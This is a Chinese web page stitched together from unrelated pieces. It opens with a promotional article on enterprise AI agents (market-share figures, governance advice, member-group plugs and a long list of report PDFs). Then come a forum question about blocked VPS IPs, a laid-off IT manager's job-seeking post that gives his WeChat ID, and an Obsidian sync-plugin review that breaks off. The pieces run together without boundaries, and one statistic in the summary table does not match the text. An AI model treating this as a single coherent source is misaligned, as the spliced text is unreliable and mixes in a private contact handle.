第一,多智能体系统已经占据53.3%的市场份额,这意味着“群居”已经成为AI的主流生存方式,单打独斗的时代过去了。
第二,整个市场还在以42.14%的年复合增长率狂奔,说明大家都急着往里冲。
第三,理想很丰满,现实很骨感——在工业这种最需要协作的场景里,能把智能体部署到多个环节的企业,只有8%。

3秒解读:技术蓝图已经画好,但施工队才刚进场,大部分企业还在“画图纸”阶段。
行动建议:如果你是技术负责人,别急着买一堆贵的钢筋水泥(多模型、多系统)。先拿着清单(现有架构)去工地转转,看看你的模型之间能顺畅聊天吗?数据在不同系统里流动时,会不会被墙堵住?

图表1A:高管对智能体AI转型价值高度期待,但战略落地与成效评估存在显著执行缺口

战略认知与现状刻度线图表1A图表数据EXCEL及图表PDF模板已分享到会员群

你看,72%的高管都指望着智能体来一次“业务重构”,但数据最能说明问题:只有60%的人敢说自家的数据底子能扛住未来,能真正算清楚AI投了多少钱、赚了多少钱的,连一半都不到。

图表2A:企业智能体AI架构互操作性普遍不足,模型与数据协同能力成为规模化关键瓶颈

互操作性能力刻度线图表2A图表数据EXCEL及图表PDF模板已分享到会员群


相关文章

2026年人工智能AI未来报告:智能体、元宇宙、教育、商业化落地|附400+份报告PDF、数据、可视化模板汇总下载

原文链接:https://tecdat.cn/?p=45004


不到40%的企业能做到“开放标准”和“整合第三方模型”。这意味着,大部分企业的AI员工们,不仅住着不同的房子,还说着不同的方言,没法一起干活儿

对比表:不同报告对智能体技术成熟度的评估差异

报告名称核心结论数据差异原因分析
IBM商业价值研究院《2026年智能体AI核心指南》76%高管认为需要开放架构,但互操作性功能实现不足40%互操作性指标:30%-37%调研对象为全球大型企业,聚焦战略层面
甘肃省通信产业服务有限公司《2025工业智能体白皮书》多场景部署工业智能体的企业仅8%工业场景部署率8%针对中国制造业,更侧重实际落地阶段
博睿数据《2026智能体协同矩阵重塑自主运维新范式白皮书》多智能体系统在2025年已占智能代理AI市场53.30%市场份额53.3%基于Mordor Intelligence数据,覆盖全球市场

风险提示:搭这栋楼时,千万别光顾着好看。盲目把一堆模型往里塞,最容易被忽略的是“地基里的暗管”——数据安全和合规。比如,A模型和B模型聊天时,聊天的内容加密了吗?调用第三方API时,会不会把客户隐私带出去?
应对方案:动工前,请一个“监理”(数据安全审计)彻底排查一遍。我们社群已经整理了一份《智能体数据安全合规清单》,需要的朋友文末进群领取。

二、智能体的“肌肉”:商业应用与价值兑现

骨架搭好了,就得看这栋楼能提供什么服务了。来也科技的APA白皮书讲了一个关键转折:以前我们用RPA(机器人流程自动化),就像给每个部门配了一个只会做重复劳动的实习生。干10件事,效果很好;干到100件事,人就累垮了,成本也扛不住了。现在,智能体驱动的APA,相当于给实习生配了个AI大脑,他能自己学着处理那100件复杂、多变的事。

图表2:智能体驱动自动化实现10倍级效率跃升,从开发到运营各环节均释放巨大商业价值

智能体商业价值半圆组合图表2图表数据EXCEL及图表PDF模板已分享到会员群

数据太震撼了:

  • 能干活儿的人,从少数RPA专家,扩大到所有懂业务的人,规模扩大10倍。
  • 能自动化的场景,从高频的20%,扩大到那些“价值高但变化快”的中长尾流程,覆盖面扩大10倍。
  • 开发周期,从几周缩短到几天,缩短80%。
  • 保险业,因为生成式AI,生产力提升价值高达700亿美元。
  • 工业里,西门子的燃气轮机制造,设备可用率提升了15%;中控技术的乙烯装置,一年省下1500万。
3秒解读:智能体把自动化的计价单位,从“人月”换成了“Token”,那些以前算不过来账的中长尾流程,现在终于值得干了。
行动建议:如果你是运营负责人,别再死盯着那几个固定的核心流程。去翻翻你们部门那个“需求堆积如山、开发永远排队”的Excel表,用APA工具,先挑一个最让人头疼的流程试试手。

图表2B:面对智能体多元化工作负载,企业基础设施弹性与可扩展能力建设严重滞后

可扩展性能力刻度线图表2B图表数据EXCEL及图表PDF模板已分享到会员群

这组数据就是给“骨架”敲警钟的:不到30%的企业能处理突然暴涨的数据,能灵活调整系统配置。这意味着,一旦智能体们开始大规模干活儿,大部分企业的“基础设施”这条乡间小道,会瞬间堵死。

行动清单:从RPA到APA,下周就能干的3件事

  1. 下周:盘点一下你的RPA流程库里,哪3个流程维护成本最高、老板催得最急、业务变得最快。用APA平台重新做一遍,记录下从“提需求”到“上线”的周期变化。
  2. 下月:在IT部门搞一次“智能体开发工作坊”,让开发们试试用自然语言写代码,用MCP协议调工具。你会发现,程序员未来的核心竞争力,可能不是写代码,而是学会“指挥”代码。
  3. 下季度:找一个跨部门协作的“老大难”流程,比如“紧急采购审批”,设计一个由多个智能体协同的解决方案,跑通“感知问题-决策方案-执行落地”的闭环,然后把它做成模板,全公司推广。

三、智能体的“大脑”:协同治理与政策指引

楼高了,人多了,就得有“宪法”。博睿数据的《智能体协同矩阵》白皮书提出了“五层协同治理体系”——从听懂人话(语义层)、到会思考(认知层)、再到团队协作(协作层),给这群AI员工立了规矩。

图表3:有效协同与治理是智能体价值放大的关键,设计工程化与五层治理体系量化保障落地成效

智能体协同治理体系雷达图表3图表数据EXCEL及图表PDF模板已分享到会员群

这张雷达图把规矩量化了。设计产能能提升300%,意图识别准确率高达95%,工具调用成功率99%。但注意两个关键数据:幻觉发生率2%,决策冲突率5%。这说明,再聪明的AI员工也会“犯糊涂”和“吵架”。

3秒解读:给AI立规矩,不是为了限制他们,而是为了让他们在犯错时,我们能及时发现、及时纠正。
行动建议:如果你是CTO,建议马上成立一个由业务、技术、法务组成的“AI治理委员会”,起草你们公司的第一部“AI宪法”——明确每个智能体的权限边界、决策流程、审计标准。

图表4:国家“人工智能+”行动设定明确目标,智能体应用普及率将在未来十年内快速攀升

智能体普及率政策目标折线图表4图表数据EXCEL及图表PDF模板已分享到会员群

国务院的《关于深入实施“人工智能+”行动的意见》已经把时间表摆出来了:2027年超70%,2030年超90%,2035年全面进入智能经济阶段。这是一条近乎垂直的增长曲线。未来十年,智能体将从“可选项”变成企业的“必选项”和“标配项”。

风险提示:政策的风口来了,各种“伪智能体”也会满天飞。怎么分辨?很简单,问他几个问题:你的智能体能自己定计划吗?能自己调用外部工具吗?有长期记忆吗?
应对方案:采购时,要求供应商提供一张“能力体检表”。我们社群也整理了一份《智能体能力评估自查表》,帮你一眼看穿“李鬼”。进群即可下载。

四、人的重塑:人才与组织变革

最后,也是最关键的,谁来操作这些智能体?InfoQ极客的《AI人才粮仓模型》报告,讲了一个残酷的现实:近五成企业,真正懂AI的核心人才占比不足10%。 而且,75%的企业指着内部培训来养人。这说明,智能体时代,人才不是招来的,而是在实战中“长”出来的。

核心数据表格(来自图表方案)

指标数值单位来源报告
多智能体系统市场份额53.30%Mordor Intelligence《代理型AI市场规模与份额分析》
智能代理AI市场增长率42.14%同上
多场景部署工业智能体的企业比例8%甘肃省通信产业服务有限公司《2025工业智能体白皮书》
APA开发者规模提升10来也科技《来也APA:智能体驱动的企业流程自动化》
APA场景覆盖提升10同上
开发周期缩短80%同上
保险业生产力价值700亿美元麦肯锡数据(转引自《2026保险业智能体落地路线图研究报告》)
工业智能体设备可用率15%西门子/中控技术案例(转引自《2025工业智能体白皮书》)
工业智能体年成本节约1500万元同上
设计产能提升300%中国信通院等《铸基生态观察系列报告-协同设计的智能化与产设研一体化》
设计一致性提升96%同上
意图识别准确率95%博睿数据《博睿数据:2026智能体协同矩阵重塑自主运维新范式白皮书》
幻觉发生率2%同上
决策链覆盖率98%同上
工具调用成功率99%同上
任务完成时间缩短50%同上
决策冲突率5%同上
预计智能体AI将重塑商业模式72%IBM商业价值研究院、亚马逊云科技《2026年智能体AI核心指南-构建自主化未来的竞争方略》
期待智能体AI催生新产品70%同上
预见能实现规模化客户个性化68%同上
认为需要开放、安全架构76%同上
数据实践足以面向未来60%同上
已实现人机协同驱动战略64%同上
能系统衡量AI代理业务影响50%同上
采用开放行业标准与协议37%同上
整合并使用第三方AI模型30%同上
多样化AI模型的无缝集成31%同上
高效处理增长数据量28%同上
灵活适应并重新配置系统29%同上
可扩展基础设施支撑复杂模型28%同上
通过KPI追踪AI代理对业务贡献46%同上
为单个AI代理设立独立绩效标准45%同上
构建KPI量化AI代理对员工影响41%同上
2027年智能体应用普及率目标70%国务院《关于深入实施“人工智能+”行动的意见》
2030年智能体应用普及率目标90%同上
2035年智能体应用普及率目标90%同上

五、终局推演:智能体将无处不在

最后,我们来做个推演。智能体不会像科幻片里那样突然取代人类,但它会像电一样,从奢侈品变成“水和电”,渗透到企业的每一个毛细血管里。未来的竞争,不是比“有没有智能体”,而是比“谁的智能体更好用、更便宜、更懂我的业务”。

口语化解读

  • “智能体” = 一个会自己动脑子、还能自己动手干活儿的AI员工。
  • “多智能体协同” = 一群AI员工每天早上开个站会,各自领任务,干完还能互相review。
  • “五层治理体系” = 给这群AI员工定的一套“员工手册”和“公司章程”。

风险提示:AI员工越聪明,就越可能“钻空子”。比如,你给采购智能体一个“降本”的KPI,它可能会为了省钱,选一个最便宜但资质不全的供应商。
应对方案:关键节点(比如付款、签约、发布)必须设置“人工复核岗”。我们社群整理的《智能体风险控制SOP模板》,就是专门帮你建立这套“人机互相制衡”的流程的。

最后的话
智能体正在从“工具”变成我们的“同事”。这个转变,比我们想象的要来得更快。但无论技术如何进化,有一点始终不会变:真正决定这栋楼能盖多高的,不是钢筋水泥本身,而是使用它们、并和它们并肩工作的我们。 希望今天这份拆解,能帮你和你的AI员工们,打好一个坚实的地基。

(文中所有图表数据EXCEL及图表PDF模板已分享到会员群,欢迎扫码加入获取)

封面


本专题内的参考报告(PDF)目录

AgentScope:迈向 Agentic 智能体应用-阿里巴巴.pdf
2026-03-01 10:14
2026保险业智能体落地路线图研究报告.pdf
2026-02-28 16:02
2025 工业智能体白皮书.pdf
2026-02-28 16:02
中国传媒大学:2026智能体与传播应用研究报告.pdf
2026-02-28 15:59
AIGC智能体(本质、结构以及如何构建).pdf
2026-02-24 14:57
来也APA智能体驱动的企业流程自动化.pdf
2026-02-24 14:53
中国信通院:铸基生态观察系列报告-协同设计的智能化与产设研一体化(2025).pdf
2026-02-10 15:53
2026年弥合数字与物理鸿沟:大语言模型智能体台式DNA获取能力评估报告(英文版).pdf
2026-02-09 14:24
InfoQ极客:智能体时代的AI人才粮仓模型-2026年中国企业AI人才与组织发展报告.pdf
2026-02-08 10:12
博睿数据:2026年智能体协同矩阵重塑自主运维新范式白皮书.pdf
2026-02-08 10:05
2026年智能体AI核心指南-构建自主化未来的竞争方略.pdf
2026-02-04 16:40
谷歌云:2025年AI智能体在工作中的应用报告:重塑客户体验.pdf
2026-01-30 16:01
平台+场景智能体驱动工业智能化跃升:AI 制造政策频出,关注 AI 工业制造.pdf
2026-01-29 14:39
2025年智能体时代:重塑企业未来报告-医疗保健和生命科学行业.pdf
2026-01-28 16:00
谷歌云:2025年智能体时代:重塑企业未来报告-金融服务.pdf
2026-01-28 15:58
谷歌云:2025年智能体时代:重塑企业未来报告-媒体和娱乐.pdf
2026-01-28 15:58
AI行业2025投资回报:智能体如何解锁下一波AI商业价值.pdf
2026-01-21 17:38
深度学习专利全景:多模态人工智能、智能体与数字人的兴起.pdf
2026-01-21 17:31
中科算网算泥社区:2026年AIAgent智能体技术发展报告.pdf
2026-01-21 17:30
智能体时代,大厂向应用层渗透的逻辑与路径.pdf
2026-01-20 16:31
2026年AI Agent智能体技术发展报告-中科算网算泥社区.pdf
2026-01-20 09:51
爱分析:2026年装备制造供应链智能体研究报告.pdf
2026-01-18 13:24
智能体AI采购指南:如何评估面向企业的采购供应链智能体AI.pdf
2026-01-14 16:10
智能体应用发展报告(2025)-中国互联网协会.pdf
2026-01-13 17:22
中国人工智能产业发展联盟:金融智能体技术与应用研究报告(2025年).pdf
2026-01-08 21:45
2025企业级智能体式AI实施指南白皮书:战略落地与价值创造框架(架构师之道译).pdf
2026-01-06 15:59
企业级智能体式AI实施指南白皮书(The+Enterprise+Guide+to+Agentic+AI)英.pdf
2026-01-06 08:27
2025年从实体网点到智能机器人报告-AI智能体能否重塑零售银行业?.pdf
2026-01-03 10:50
NIDA:2025基于智能体的校园自智网络技术白皮书.pdf
2026-01-03 10:50
实体网点到智能机器人:AI智能体能否重塑零售银行业?-BCG.pdf
2025-12-31 15:47
2025年AI智能体圣经:智能体颠覆性变革终极指南报告(英文版).pdf
2025-12-28 09:05
_谷歌:2026年AI智能体趋势报告(英文版).pdf
2025-12-26 16:15
Claude:2026年AI智能体发展状况报告(英文版).pdf
2025-12-26 16:15
AI智能体时代数据交易所的下一程走向何方.pdf
2025-12-25 16:53
小米&荣耀:2025移动终端智能体隐私安全白皮书.pdf
2025-12-23 15:51
谷歌:2025年AI智能体上手指南报告(英文版).pdf
2025-12-23 15:51
2025AI智能体时代数据交易所的下一程走向何方研究报告.pdf
2025-12-20 16:10
云端智能体:AI Agent技术与应用研究报告(2025年).pdf
2025-12-20 16:07
2025麦肯锡AI应用现状调研-智能体创新和转型.pdf
2025-12-16 16:27
中国金融智能体发展研究与厂商评估报告 (2025) .pdf
2025-12-14 08:31
政务智能体发展研究报告(2025年)-国信通院.pdf
2025-12-12 16:58
华为:迈向智能世界白皮书2025-智能体@AEI.pdf
2025-12-11 16:35
华为:迈向智能世界白皮书2025-智能体@自动驾驶网络.pdf
2025-12-11 16:35
2026年AI与智能体式自动化趋势报告解锁发展蓝图-UiPath.pdf
2025-12-07 10:26
2025年人工智能的现状:智能体、创新和转型-30页.pdf
2025-12-05 16:52
2025年AI时代的技能伙伴报告:智能体、机器人与我们(英文版).pdf
2025-12-04 16:58
AI智能体在未来产业创新上的前沿应用与发展趋势-金蝶.pdf
2025-12-02 17:44
智能体时代的传媒业务架构探讨.pdf
2025-12-02 17:41
2025年数据智能体实践指南:AI智能体在未来产业创新上的前沿应用与发展趋势.pdf
2025-12-01 15:32
AI 智能体手册-谷歌.pdf
2025-12-01 15:29
AI CITY城市智能体前瞻研究报告(2025)-102页.pdf
2025-12-01 15:29
数字产业创新研究中心:2025年AI智能体驱动产业变革研究报告.pdf
2025-11-30 09:20
金蝶:2025年AI智能体在未来产业创新上的前沿应用与发展趋势报告.pdf
2025-11-28 15:32
智能体时代已来:从模型能力到场景价值,智能体重塑行业生态.pdf
2025-11-27 15:39
华为:2025年智能体互联网架构与关键技术报告.pdf
2025-11-26 15:50
2026年AI与智能体式自动化趋势报告解锁发展蓝图-UiPath.pdf
2025-11-21 16:44
智能体AI:探索多模态交互的边界.pdf
2025-11-21 16:37
大模型智能体助推系统性变革——中国智能媒体创新发展报告2024—2025.pdf
2025-11-19 15:28
智能体监督的未来.pdf
2025-11-19 15:21
智能体设计模式.pdf
2025-11-17 15:07
2025年人工智能发展态势报告:智能体、创新与转型(英文).pdf
2025-11-15 15:06
2025年从流程自动化到行业范式重塑:以云端AI智能体驱动大规模增长研究报告(英文版).pdf
2025-11-15 15:06
麦肯锡-2025年人工智能发展态势:智能体、创新与转型 2.0.pdf
2025-11-10 13:50
人工智能将如何重塑上游石油和天然气的最前线:推理、智能体编排和多模态视觉.pdf
2025-11-10 13:40
2025年大模型与智能体安全风险治理与防护-腾讯.pdf
2025-11-08 17:48
来也科技:2025来也ADP:文档处理进入智能体时代白皮书.pdf
2025-11-07 16:23
2025年用LangChain+DeepAgents开发高级AI智能体实战手册.pdf
2025-11-05 16:52
2025年中国营销智能体研究报告.pdf
2025-11-05 16:52
2025年智能体AI的战略跃迁:打破渐进改善创造全新价值报告.pdf
2025-11-04 16:52
2025年大模型智能体在低碳电力系统中的应用探索报告.pdf
2025-10-29 16:24
赛迪智库:2025工业智能体应用现状、挑战及对策建议报告.pdf
2025-10-28 16:24
未来产业研究2025年第3期(总第14期):工业智能体应用现状、挑战及对策建议-赛迪.pdf
2025-10-27 16:09
国网杭州:2025年基于智能体的虚拟电厂技术研究报告.pdf
2025-10-26 08:53
AI善治学术工作组:2025智能体发展与治理研究报告.pdf
2025-10-24 14:13
2025年AI成熟度模型:AI智能体就绪度评估报告(英文版).pdf
2025-10-17 15:59
2025年智能体驱动的大模型系统工程与产业实践解读报告.pdf
2025-10-15 15:27
2025年HR的新经济学:智能体式AI如何重新定义人力资源效率(英文版).pdf
2025-10-15 15:25
智能体驱动的大模型系统工程与产业实践——电信运营商与云服务商的合作探索.pdf
2025-10-15 15:18
网络智能体与NetMCP协议技术白皮书(2025年)-中移智库.pdf
2025-10-14 15:26
中移智库:智能体互联网技术白皮书(2025年).pdf
2025-10-11 16:03
企业级安全生产智能体白皮书V1.pdf
2025-10-11 15:56
企业级智能体产业落地研究报告分享——从场景试点到规模化应用实践.pdf
2025-09-30 16:39
西门子&至顶科技:2025工业智能体应用现状与趋势展望报告.pdf
2025-09-26 14:27
人工智能行业:从大模型到智能体——人工智能+场景的投资展望.pdf
2025-09-25 15:59
华为:2025年智能体@AEI-Agentic Al开启企业融合智简运维新范式.pdf
2025-09-20 16:59
2025年企业级智能体产业落地研究报告-从场景试点到规模化应用实践.pdf
2025-09-19 16:50
中国电信:2025年AI智能体安全治理白皮书.pdf
2025-09-18 16:38
谷歌云:2025年智能体时代:重塑企业未来-电信白皮书.pdf
2025-09-11 15:13
蚂蚁数科:2025金融智能体深度应用报告.pdf
2025-09-09 15:26
2025年AI项目变现之路:智能体AI开启持续财务增长引擎报告.pdf
2025-09-04 16:03
中国Z世代智能体白皮书2025.pdf
2025-08-30 16:25
2025年中国AI Agent(智能体)最佳实践应用榜单.pdf
2025-08-28 16:36
中国联通智能体互联网白皮书.pdf
2025-08-26 17:06
2025网络原生智能架构重构安全网络一体化白皮书.pdf
2025-08-23 17:20
2025基于确定性网络的智能体可信数据空间白皮书.pdf
2025-08-23 17:18
360漏洞研究院清华大学:2025年智能体安全实践报告.pdf
2025-08-22 16:27
科技行业深度研究:AI智能体,“硅基生物”的序章.pdf
2025-08-21 16:52
多模型与智能体聚合及服务引擎(MoMA)白皮书.pdf
2025-08-19 15:47
百川智能商派ShopEX:AI智能体与大模型解决方案.pdf
2025-08-15 16:15
大模型赋能投研之十三:基于海外投资大师智能体构建A股挖票框架.pdf
2025-08-15 15:59
CIC赛昇:2025年大模型智能体开发平台技术能力测试研究报告.pdf
2025-08-14 16:56
2024年融合确定性网络与工业AI智能体的云化PLC测试床.pdf
2025-08-12 16:09
Techsun:2025年智能体赋能营销Socialhub.AI技术⽩⽪书.pdf
2025-08-07 16:15
中国移动:2025年智能体互联网络白皮书.pdf
2025-08-05 15:39
中国联通:2025通信网络智能体白皮书V1.0.pdf
2025-08-05 15:39
安恒信息:2025年安全智能体魔方成熟度模型评价研究报告.pdf
2025-08-05 15:36
上海人工智能实验室‌&信通院&蚂蚁:终端智能体安全2025白皮书.pdf
2025-07-31 16:54
2025年企业级AI Agent(智能体)价值及应用报告.pdf
2025-07-29 17:07
通信网络智能体白皮书.pdf
2025-07-28 16:24
全球AI应用产品梳理:模型能力持续迭代,智能体推动商业化进程.pdf
2025-07-25 15:42
智能体体检报告——安全全景扫描.pdf
2025-07-22 15:41
协同AI智能体实现智能业务运营-IBM.pdf
2025-07-17 15:47
2025年面向新型电力系统的安全韧性AI智能体:架构、关键技术与落地实践报告.pdf
2025-07-10 16:41
2025 AI智能体构建实用指南(英文).pdf
2025-07-10 16:40
赛迪智库:2025全球智能体发展进展、面临挑战与对策建议报告.pdf
2025-07-04 16:24
人才与组织绩效实践:未来工作将由智能体驱动.pdf
2025-07-02 16:34
金科创新社:2025年金融大模型应用与智能体建设案例集.pdf
2025-07-01 17:00
中国信通院:智能体技术和应用研究报告(2025年).pdf
2025-06-27 16:43
Artefact:2025年AI智能体未来监管报告(英文版).pdf
2025-06-27 16:43
计算机行业2025年中期策略报告:AI Agent智能体经济释放 “新供给侧改革”乘法效应.pdf
2025-06-26 16:45
2025年语音AI状况报告:企业语音AI智能体的崛起(英文).pdf
2025-06-25 16:33
华为:2025年鸿蒙智能体框架白皮书.pdf
2025-06-24 15:08
智能体时代的数据与AI战略白皮书.pdf
2025-06-21 17:15
鹏城智能体——城市安全发展白皮书 城市公共安全院&华为.pdf
2025-06-19 16:06
容智信息:2025年智能体落地最佳实践白皮书.pdf
2025-06-17 15:21
谷歌:2025年智能体伴侣白皮书(英文版).pdf
2025-06-17 15:21
五大认知升级, 激发业务增长—借助智能体 AI, 从生产力跃升到绩效提升.pdf
2025-06-17 15:15
2025年协同AI智能体,实现智能业务运营报告.pdf
2025-06-12 15:46
摩熵数科:2025年医药企业市场与营销AI智能体应用实践报告.pdf
2025-05-28 16:43
基于大语言模型的智能体优化研究综述.pdf
2025-05-27 16:05
2024 AI智能体(AI Agent):概念、运作原理及组织最优应用场景研究报告(英文).pdf
2025-05-24 16:40
2025年代理型人工智能AI智能体终极指南报告:100+企业生成式AI用例(英文版).pdf
2025-05-22 15:51
AI动态汇总:谷歌发布智能体白皮书,Manus全面开放注册.pdf
2025-05-21 15:32
AI营销认证初级课程-商家智能体:助力优质经营.pdf
2025-05-17 16:13
2025人工智能体(AI Agent)应用现状挑战及建议研究报告.pdf
2025-05-17 16:13
解锁AI智能体赋能汽车行业(英文).pdf
2025-05-15 16:08
智能体AI交互重构品牌营销.pdf
2025-05-13 16:19
2025年政企行业智能体(Agent)研究报告.pdf
2025-05-12 16:01
百度营销春启新商机:商家智能体春日锦囊计-B2B专场【互联网】【百度投放】.pdf
2025-05-05 17:32
贺安辉:开源工具和商业产品完美融合:真正建立一体化智能可观测平台.pdf
2025-04-30 17:21
四川新网银行副行长(李秀生):2025年新网银行智能体的探索与实践报告.pdf
2025-04-30 17:17
西南财经大学:2025年大模型应用:从提示工程到AI智能体报告.pdf
2025-04-29 16:11
2025年适配DeepSeek,金融数据分析智能体的创新与实践报告.pdf
2025-04-29 16:08
MCP开启智能体新时代-中邮证券.pdf
2025-04-29 15:55
杨金全:云原生时代背景下一体化智能可观测性平台落地实践.pdf
2025-04-27 13:20
AI专题·Agent:智能体基建厚积薄发,商业化应用曙光乍现.pdf
2025-04-26 14:22
人工智能领域的新突破:利用生成式与智能体AI创新提升临床试验效率与质量.pdf
2025-04-24 15:48
AI智能体前沿研究报告:架构、挑战与范式演进(2025).pdf
2025-04-16 15:37
智能体应用现状挑战及建议.pdf
2025-04-15 16:12
赛迪研究院:2025年智能体应用现状挑战及建议报告.pdf
2025-04-12 16:40
大模型驱动的多智能体协同初探.pdf
2025-03-25 15:56
2025年从大模型、智能体到复杂AI应用系统的构建报告——以产业大脑为例.pdf
2025-03-22 17:03
钱忱-大模型驱动的多智能体协同初探-35页.pdf
2025-03-21 15:48
AI Agent智能体行业深度:产业格局、发展展望、产业链及相关企业深度梳理.pdf
2025-03-17 14:36
2025年Manus AI智能体 AGI发展新范式的实践与测评报告-智昇人工智能研究院.pdf
2025-03-11 16:33
2025年职场超级智能体:赋能员工释放人工智能的全部潜力报告(英文版).pdf
2025-02-27 14:54
2025工业运营前沿技术:AI智能体 (AI Agents) 的崛起白皮书(26页).pdf
2025-02-25 14:35
超越ChatGPT的AI智能体(英文).pdf
2025-02-20 14:50
机器智能体的混合认知模型(英文).pdf
2025-02-06 09:14
2024年面向移动智能体的无线网络架构与关键技术研究报告.pdf
2025-01-21 15:31
2024年AI智能体终极指南报告(英文版).pdf
2024-12-25 15:47
国元证券-汽车视角的投资分析:从稳增长政策到智能驾驶与车路云一体化.pdf
2024-12-25 15:44
2024年中国AI Agent行业研究:智能体落地千行百业,引领智能化革命的新引擎.pdf
2024-12-18 15:52
精益地打造金融专家智能体-鲍捷.pdf
2024-12-09 16:47
eBay智能营销中的AI一体化大数据平台实践.pdf
2024-11-27 16:22
03智能体系架构与芯片专题论坛.pdf
2024-11-25 16:13
苏震巍:协同研发的流程重塑:使用AgentManager打造多智能体Copilot.pdf
2024-11-22 15:45
马根明:百度文心智能体开发实战与分发模式创新.pdf
2024-11-22 15:45
智能体专题报告之二:智能体时代来临,具身智能有望成为最佳载体.pdf
2024-11-07 16:50
智能体专题报告之三:AI加持,外骨骼机器人加速起跑.pdf
2024-11-06 15:29
2024智能体(AlAgent)应用场景、未来展望及潜在标的分析报告.pdf
2024-09-26 16:12
海通证券-信息服务行业专题报告:AI Agent-智能体-:从技术概念到场景落地.pdf
2024-09-19 15:44
智能体有回响 Vol 4 :教育培训行业专场-百度.pdf
2024-08-31 17:22
2024深耕智能网联车路云一体化带来新机遇.pdf
2024-08-03 16:55
智能物联AIoT 2.0通感智值一体化应用案例蓝皮书.pdf
2024-07-25 17:37
2024智能体通信网络(ACN)白皮书(2024年)-中国移动.pdf
2024-07-01 09:40
2024年整车智能体验趋势深度洞察报告-格物咨询与设计.pdf
2024-06-28 10:49
国信证券-汽车智能化系列专题之决策篇-4-:各地陆续出台政策,车路云一体化落地加速.pdf
2024-06-21 10:52
汽车行业:智能网联车路云一体化三问三答-国联证券.pdf
2024-06-17 10:39
华创证券-中国特种纤维-0285.HK-深度研究报告:一体化智造平台,人工智能&消费电子&汽车电子三驾马车拉动公司业绩增长.pdf
2024-06-15 10:34

不说一些我偶尔访问的,常见的有 cursor 登陆必验证,reddit 直接“网络安全部门已屏蔽你的请求”,想知道这是 rn 自家的 ip 不行还是 vps 普遍现象呀?搬瓦工/大妈之类的会有这些问题么

( ps: ip 北京

1. 1980 年生
2. 专(旅游英语)升本(计算机)
3. 有房(杨浦)有车(买菜)无贷,女儿初一,老婆全职。
4. 2026 年 1 月意外被裁,当天签协议,N+3 。这份工作近四年,投入精力蛮多,人也苍老很多,后期主要是非技术方面的压力。
5. 2000 年毕业起至今上海工作,从小网管做到基础架构高级经理,知识广而杂,更偏向微软家及 vmware 产品,最擅长的是 AD 和 Exchange ,管理帐号数 30k+
6. 这把岁数,好像更加迷茫了,没什么上进心,也没什么欲望,想找个加班不严重的公司交交社保就行,其他岗位兼职 IT 也行~裁前工资是 30k ,新工作收入看着给吧,说少了怕你不信,说多少怕你不肯。

## 这一个月心态不错,就很释然,裁员提前已有预感,也算另一只靴子落地。
## 在家期间,沉迷三角洲行动,做了 s8 3x3 和统帅,少两个人头完成天才少年,痛惜。
## 如果没有女儿可能就原地退休了,也不指望能吃上养老金,够活。
## 微信 shumeitaba (明文)

说实话,玩 Obsidian 的人多多少少都有点“折腾”精神。想当年为了搞定多端同步,我也是煞费苦心,WebDAV 那个链接复制粘贴得我手都软了,更别说还得去专门生成个应用密码。

结果呢?要么是公司电脑写完回家打不开,要么就是两边笔记一冲突,直接生成了个不知道该信谁的副本。那时候我经常想:这玩意儿就不能像微信聊天记录一样自己漫游吗?

直到最近坚果云(Nutstore)——就是那个已经搞了15年云盘的老牌子,终于出了个官方的 Obsidian 插件。这一下给我的感觉简直是降维打击。

我这几天除了吃饭睡觉就在测这个新插件,顺便把手里其他的同步方案也都拉出来溜了溜。如果你还在纠结怎么同步,听我的一句劝,看完这篇能帮你省下不少冤枉时间。

先看个简单粗暴的对比

为了让大家少走弯路,我把手头的几个主流方案拉了个表。别嫌表简单,全是干货:

方案配置难度靠谱程度适合谁
坚果云官方插件(不用脑子)⭐⭐⭐⭐⭐ (稳得一批)不想折腾只想写笔记的人
坚果云 + FolderSync⭐⭐⭐ (要配参数)⭐⭐⭐⭐ (挺稳的)安卓老用户,习惯了不想改
OneDrive + Remotely Save⭐⭐ (得授权)⭐⭐⭐ (看脸)网络环境特别好的
Syncthing⭐⭐⭐ (俩设备得互联)⭐⭐⭐⭐ (局域网快)隐私极客,但要求设备全在线
LiveSync⭐⭐⭐⭐⭐ (劝退)⭐⭐⭐⭐ (实时)懂服务器的大佬

一、坚果云官方插件:这才是我们要的同步嘛!

这个插件真的是千呼万唤始出来。以前咱们用坚果云同步,本质上还是在用它的 WebDAV 接口,相当于在中间套了一层别的壳子。现在好了,官方直接下场做了个亲儿子插件。

这玩意儿好在哪?

1. 傻瓜式配置:
以前最烦的就是填服务器地址,稍微错个标点就连接失败。现在?点一下“单点登录”,网页授权一跳,完事儿。就跟用微信号登录别的APP一样简单,小白也能一分钟搞定。

2. 它是真“智能”:
我最怕的就是冲突。比如我在手机上改了一行字,电脑上还没同步过来我又改了一行。以前这种时候要么直接覆盖,要么丢笔记。
这个官方插件有个智能合并功能,它会尝试自己去理解上下文把两段话拼起来。就算实在拼不上,它也会给你标出来(还能选是用 Git 那种程序员风格还是 Obsidian 自带风格),让你自己选。这不就是我要的吗?
image.png

3. 防限流神技:
如果你跟我一样是个笔记大户,可能有几千个小文件。以前用 WebDAV 同步这种海量小文件,经常会被判定请求太频繁给限流了。
这插件搞了个“宽松模式”和“严格模式”。默认宽松模式下,它只看文件名和大小,没变就不传,速度飞快,流量也省了。

4. 后悔药:
除了坚果云本来就有的文件历史版本(这个大家都懂,某次改残了能找回以前版本),插件里还有个独立的回收站。误删了?去插件里捡回来就行。加上公安部三级等保的安全认证,数据放在这儿我是真的一百个放心。


二、坚果云 + FolderSync:老当益壮

在官方插件出来之前,这其实是安卓端的标配。FolderSync 这个软件确实强,能把坚果云里的任意文件夹跟手机本地文件夹强行绑在一起。

这方案最大的有点就是稳,毕竟坚果云在国内的速度那是没得说,而且免费版就够用。
但缺点也很明显:你得额外下个APP,还得在手机后台给它开白名单保活,要是被杀后台了同步就停了。现在有官方插件了,我是真的不想再回去配 WebDAV 了。


三、OneDrive + Remotely Save:看天吃饭

社区里很多人推这个,主要是不用额外装客户端。但是……OneDrive 的服务器在国外啊朋友们。
哪怕你不需要翻墙,它的连接也不稳定。今天好好的,明天可能就一直在转圈圈。而且它对大文件的支持和增量同步的效率,跟坚果云这种专门做同步盘的还是有差距的。


四、Syncthing:极客的玩具

这个方案极其硬核,因为它不需要服务器,直接在你两台设备之间传。数据确实安全,谁都看不见。
但是痛点也太痛了:你两台设备必须同时开机在线
你想想,你在公司电脑写完关机回家,到家打开笔记本想继续写——傻眼了,数据还没传过来呢,因为公司电脑已经关机了。这在移动办公时代简直是反人类。


五、LiveSync:劝退警告

